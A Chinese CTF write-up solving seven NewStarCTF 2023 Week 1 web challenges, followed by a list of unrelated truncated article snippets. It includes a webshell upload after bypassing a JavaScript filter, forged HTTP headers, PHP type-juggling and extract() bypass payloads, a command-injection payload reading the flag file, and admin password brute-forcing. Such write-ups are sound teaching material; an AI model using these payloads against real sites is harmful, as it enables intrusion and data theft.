【Web】NewStarCTF Week1 个人复现
目录
①泄露的秘密
②Begin of Upload
③Begin of HTTP
④ErrorFlask
⑤Begin of PHP
⑥R!C!E!
⑦EasyLogin
①泄露的秘密
盲猜/robots.txt,访问得到flag前半部分
第二个没试出来,老老实实拿dirsearch扫吧
访问/www.zip
下载附件,拿到第二部分
flag:
flag{r0bots_1s_s0_us3ful_4nd_www.zip_1s_s0_d4ng3rous}
②Begin of Upload
随便上传一个php文件
发现有前端限制
禁一手js
继续上传
成功传马,直接rce即可,下略
③Begin of HTTP
常规的题,不多解释
POST /?ctf=1 HTTP/1.1
Host: node4.buuoj.cn:28438
User-Agent: NewStarCTF2023
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Cookie: power=ctfer
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
Content-Length: 28
Referer:newstarctf.com
X-Real-IP: 127.0.0.1secret=n3wst4rCTF2023g00000d注意最后的伪造本地请求方式要字典爆破
④ErrorFlask
看标题表述就是搞破坏让flask报错
先正常传俩数字,回显告诉我们不是ssti
传个字母试试
payload:
?number1=a&number2=1成功报错拿到flag
⑤Begin of PHP
贴出源码
<?php
error_reporting(0);
highlight_file(__FILE__);if(isset($_GET['key1']) && isset($_GET['key2'])){echo "=Level 1=<br>";if($_GET['key1'] !== $_GET['key2'] && md5($_GET['key1']) == md5($_GET['key2'])){$flag1 = True;}else{die("nope,this is level 1");}
}if($flag1){echo "=Level 2=<br>";if(isset($_POST['key3'])){if(md5($_POST['key3']) === sha1($_POST['key3'])){$flag2 = True;}}else{die("nope,this is level 2");}
}if($flag2){echo "=Level 3=<br>";if(isset($_GET['key4'])){if(strcmp($_GET['key4'],file_get_contents("/flag")) == 0){$flag3 = True;}else{die("nope,this is level 3");}}
}if($flag3){echo "=Level 4=<br>";if(isset($_GET['key5'])){if(!is_numeric($_GET['key5']) && $_GET['key5'] > 2023){$flag4 = True;}else{die("nope,this is level 4");}}
}if($flag4){echo "=Level 5=<br>";extract($_POST);foreach($_POST as $var){if(preg_match("/[a-zA-Z0-9]/",$var)){die("nope,this is level 5");}}if($flag5){echo file_get_contents("/flag");}else{die("nope,this is level 5");}
} payload:
?key1[]=1&key2[]=2&key4[]=1&key5=2024.c
key3[]=1&flag5=![]
主要解释下level3和5
level 3利用strcmp传入数组会返回0来绕过
level 5利用extract可以解析并创建变量,来psost一个flag5进去(因为发现源码中没有flag5)。另外对post内容做了限制,不能有字母数字,这里可以传一个![]进去,[]空数组会隐式转换为false,在!取反得到我们要的true
⑥R!C!E!
先是构造md5
(默默掏出工具爆破)
最终payload:
password=114514&e[v.a.l=echo `tac /f*`;
⑦EasyLogin
进来是个登录框
随便注册一个账号登录看看
没什么用,估计得admin登录
提示密码至少6位,尝试爆破6位密码
爆破得密码为000000
登录,发包得到302重定向,在repeater里看即可
相关文章:
【Web】NewStarCTF Week1 个人复现
目录 ①泄露的秘密 ②Begin of Upload ③Begin of HTTP ④ErrorFlask ⑤Begin of PHP ⑥R!C!E! ⑦EasyLogin ①泄露的秘密 盲猜/robots.txt,访问得到flag前半部分 第二个没试出来,老老实实拿dirsearch扫吧 访问/www.zip 下载附件,拿到第二部分…...
Android 提示框代码 java语言
在Android中,你可以使用 AlertDialog 类来创建提示框。以下是一个简单的Java代码示例,演示如何创建和显示一个基本的提示框: import android.app.AlertDialog; import android.content.Context; import android.content.DialogInterface; im…...
【c语言】二维数组的对角线对称交换
c语言,假设已经有了一个二维数组,对其进行对角线对称变换,如(0,1)与(1,0)变换,并打印。 示例 #include <stdio.h>void swap(int *a, int *b) {int te…...
Sulfo-CY3 NHS荧光染料的制备和表征
Sulfo-CY3 NHS(源自星戈瑞的花菁染料)荧光染料的制备和表征是确保染料质量和性能的关键步骤。制备Sulfo-CY3 NHS荧光染料: 原材料准备:准备所需的原材料,包括CY3 NHS ester(或等效的前体),用于制备Sulfo-C…...
数字乡村:科技赋能农村产业升级
数字乡村:科技赋能农村产业升级 数字乡村是指通过信息技术和数字化手段,推动农业现代化、农村经济发展和农民增收的一种新模式。近年来,随着互联网技术的飞速发展,数字乡村开始在全国范围内迅速兴起,为乡村经济注入了新…...
K8S部署mongodb-sharded-cluster(7.0.2)副本分片
添加源 helm repo add bitnami https://charts.bitnami.com/bitnami指定版本拉取 helm pull --repo https://charts.bitnami.com/bitnami mongodb-sharded --version 7.0.5安装时选择SCRAM-SHA-1默认是SCRAM-SHA-256 helm install -n prod mymongodb mongodb-sharded --value…...
Dockerfile-CentOS7.9+Python3.11.2
本文为CentOS7.9下安装Python3.11.2环境的Dockerfile # CentOS with Python3.11.2 # Author xxmail.com# build a new image with basic centos FROM centos:centos7.9.2009 # who is the author MAINTAINER xxmail.comRUN ln -sf /usr/share/zoneinfo/Asia/Shanghai /etc/…...
自定义责任链Filter实现
核心接口 Filter package com.xxx.arch.mw.nbp.common.extension;import com.xxx.commons.data.domain.Result;/*** date 2023/08/25*/ public interface Filter {Result invoke(final Invoker invoker, final Invocation invocation); } Invoker package com.xxx.arch.mw.…...
NX二次开发UF_CSYS_create_matrix 函数介绍
文章作者:里海 来源网站:https://blog.csdn.net/WangPaiFeiXingYuan UF_CSYS_create_matrix Defined in: uf_csys.h int UF_CSYS_create_matrix(const double matrix_values [ 9 ] , tag_t * matrix_id ) overview 概述 Creates a 3 x 3 matrix. 创建…...
css引入的三种方式
css引入的三种方式 一、内联样式二、外部样式表三、 内部样式表总结trouble 一、内联样式 内联样式也被称为行内样式。它是将 CSS 样式直接应用于 HTML 元素的 style 属性中的一种方式 <p style"color: blue; font-size: 16px;">这是一个带有内联样式的段落。&…...
含羞草研究所研究含羞草的代码
点击进入 一个简单的Python代码示例,用于模拟含羞草的行为: class Mimosa: def __init__(self): self.leaves_open True def touch_leaf(self): if self.leaves_open: print("Leaf closes due to touch.") self.leaves_open False else: p…...
常见立体几何图形的体积
文章目录 abstract祖暅原理推论 棱锥和圆锥的体积用积分的方法推导棱台和圆台的体积圆台体积公式 球体的体积球体的表面积 abstract 锥体和球体的体积公式主要通过积分的方法推导 这类公式的推导中学一般不要求,只要会应用公式在高等数学中由合适和方便的工具来推导这些公式而…...
vue3 + vue-router + keep-alive缓存页面
1.vue-router中增加mate.keepAlive和deepth属性 {path: /,name: home,component: HomeView,meta: {// 当前页面要不要缓存keepAlive: false,// 当前页面层级deepth: 1,}},{path: /list,name: list,component: ListView,meta: {// 当前页面要不要缓存keepAlive: true,// 当前页…...
unigui同页面内重定向跳转,企业微信内部应用开发获取用户code例子
procedure TMainForm.UniFormCreate(Sender: TObject); varurl: string;code: string; begin //如果没有code值,将进行重定向if UniApplication.Parameters.Values[code] thenbeginurl :https://open.weixin.qq.com/connect/oauth2/authorize?appid你们的企业ID&…...
垃圾数据啊
const arr [] //定义空数组 for (const key in this.fgkSyData) { //循环 this。sgksudata 数据arr.push( //push添加到 arr { [key]:this.fgkSyData[key] } //{} 在对象中 重新 定义key value 转换成对象) } console.log(arr, arr) …...
GB/T 29498-2013 木门窗检测
木门窗是指以木材、木质复合材料为主要材料制作框和扇的门窗。 GB/T 29498-2013 木门窗检测项目 测试项目 测试标准 外观质量 GB/T 29498 尺寸 GB/T 29498 装配质量 GB/T 29498 含水率 GB/T 17657 附着力 GB/T 4893.4 外门窗耐冷热循环 GB/T 4893.7 耐划痕 GB/…...
rocketMQ5.0顺序消息golang接入
本人理解,顺序消息如果不分消息组,那么会影响并行处理速度,所以尽量消息组分的散一些 首先上要求,官方文档如下: 总结: 1.必须同一个消息组,消息组和消费组不是一个概念,不要混 2.必…...
HuggingFace-利用BERT预训练模型实现中文情感分类(下游任务)
准备数据集 使用编码工具 首先需要加载编码工具,编码工具可以将抽象的文字转成数字,便于神经网络后续的处理,其代码如下: # 定义数据集 from transformers import BertTokenizer, BertModel, AdamW # 加载tokenizer token Ber…...
PSP - 从头搭建 抗原类别 (GPCR) 的 蛋白质结构预测 项目流程
欢迎关注我的CSDN:https://spike.blog.csdn.net/ 本文地址:https://spike.blog.csdn.net/article/details/134595717 GPCRs(G Protein-Coupled Receptors,G蛋白偶联受体),又称为7次跨膜受体,是细…...
城市NOA加速落地,景联文科技高质量数据标注助力感知系统升级
当前,自动驾驶技术的演进正在经历着从基础L2到L3过渡的重要阶段,其中NOA(自动辅助导航驾驶)扮演着至关重要的角色。城市NOA(L2.9)作为城市场景下的NOA,被看作是车企向更高阶自动驾驶迈进的必经之…...
闲鱼自动化运营助手:基于Appium的移动端UI自动化实践
1. 项目概述:一个自动化“闲鱼”运营助手的诞生最近在逛一些开发者社区时,发现了一个挺有意思的项目,叫“XianyuAutoAgent”。光看名字,大概就能猜到它的用途——一个针对“闲鱼”平台的自动化代理工具。对于很多在闲鱼上做点小生…...
Gitee的AI战略升级:如何重塑中国开源生态的技术底座
中国开源生态正在经历一场前所未有的智能化变革。作为国内最大的代码托管平台之一,Gitee近期推出的"模力方舟"战略,标志着其从传统代码托管服务向AI驱动的工程效率平台的全面转型。这一转变不仅关乎单一产品的升级,更预示着中国开源…...
)
告别零散文件!用Inno Setup一键打包你的Unity游戏(Windows版保姆级教程)
告别零散文件!用Inno Setup一键打包你的Unity游戏(Windows版保姆级教程) 当你终于完成Unity游戏的开发,准备将作品分享给朋友或发布到小型平台时,是否曾为那些散落的.exe、Data文件夹和MonoBleedingEdge文件感到困扰&…...
:LLM辅助日志聚类+异常模式自学习实录)
VSCode日志分析进入智能时代(2026正式版首发解读):LLM辅助日志聚类+异常模式自学习实录
更多请点击: https://intelliparadigm.com 第一章:VSCode日志分析进入智能时代(2026正式版首发解读) VSCode 2026 正式版首次集成原生 Log Intelligence Engine(LIE),将日志分析从“人工翻查”…...
Keras图像增强技术实战:提升计算机视觉模型性能
1. 项目概述:为什么需要图像增强?在计算机视觉任务中,数据永远是王道。但现实情况是,我们往往难以获取足够数量和多样性的标注图像数据。想象一下你要训练一个猫狗分类器,但手头只有100张正面拍摄的宠物照片——这样的…...
10个Electron Release Server最佳实践:提升应用发布效率
10个Electron Release Server最佳实践:提升应用发布效率 【免费下载链接】electron-release-server A fully featured, self-hosted release server for electron applications, compatible with auto-updater. 项目地址: https://gitcode.com/gh_mirrors/el/elec…...
如何将Flat Color Icons集成到React/Vue项目中:完整代码示例
如何将Flat Color Icons集成到React/Vue项目中:完整代码示例 【免费下载链接】flat-color-icons Free Flat Color Icons 项目地址: https://gitcode.com/gh_mirrors/fl/flat-color-icons Flat Color Icons是一套包含312个免费图标资源的开源项目,…...
LLM 推理性能深潜:为什么 L20 跑不过 A800?——从带宽瓶颈到多并发调优
核心观点:LLM 的 Decode(生成)阶段是典型的 Memory Bandwidth Bound(显存带宽密集型) 任务。GPU 大部分时间不是在“计算”,而是在“搬运数据”。带宽决定了上限,Batch Size 决定了并发效率。1.…...
7种配色+百变空间+全系ADS 4.1:问界M6的“新锐”不止一面
文 | 雄墨年轻人想要一台怎样的SUV?有人要个性,开出去不能被淹没在车流里;有人要能装,周末骑车、露营、搬家的需求全都要满足;有人要聪明,智驾不能比手机落后。以前,这些需求被分散在不同车型里…...
)
D6.3 PriorityClass 常用实验(2个)
D6.3 PriorityClass 常用实验(2个) 基于您的材料,精简为2个常用场景。 资源不足时,高优先级Pod会抢占低优先级Pod的资源。 前置准备 # 创建测试命名空间 kubectl create namespace priority-test 实验1:创建高低优先级类 # 1. 创建低优先级类(-9,材料中的值) cat &…...